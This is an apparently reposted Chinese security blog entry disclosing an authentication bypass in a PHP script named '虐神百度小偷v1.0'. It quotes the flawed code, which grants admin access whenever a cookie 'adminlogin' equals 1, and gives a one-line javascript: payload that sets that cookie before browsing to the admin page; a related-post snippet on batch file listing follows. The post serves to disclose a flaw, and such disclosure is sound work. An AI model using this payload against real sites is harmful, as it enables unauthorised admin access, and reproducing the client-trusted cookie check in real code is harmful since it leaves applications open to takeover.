虐神百度小偷v1.0 cookie 欺骗

admin 2021年4月3日20:08:08评论38 views字数 87阅读0分17秒阅读模式

虐神百度小偷v1.0 cookie欺骗

本想发布歪酷CMS漏洞

怎么知道cond0r抢先发布了,为了版主他真的豁出去了! 在这里祝他成功!

此洞有点2... 毕竟是洞~ 让作者知道下也好.

if(isset($_COOKIE['adminlogin']) && $_COOKIE['adminlogin']=="1")//你懂的...
  Header("Location: main.php");
else
  Header("Location: login.php");
?>

javascript:alert(document.cookie="adminlogin="+escape("1"));

再浏览 127.0.0.1/admin/main.php

文章来源于lcx.cc:虐神百度小偷v1.0 cookie 欺骗

相关推荐: 使用批处理,Bat列出指定目录下存在的所有文件

使用批处理、Bat 列出指定目录下存在的所有文件: 列出F盘所有文件,并输出结果到a.txt。如果不想输出结果,则去掉命令中的“>a.txt”即可。 不包含目录、文件夹:dir /a-d /s /b f:>a.txt 包含目录及文件夹:dir /a…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:08:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   虐神百度小偷v1.0 cookie 欺骗https://cn-sec.com/archives/325677.html

发表评论

匿名网友 填写信息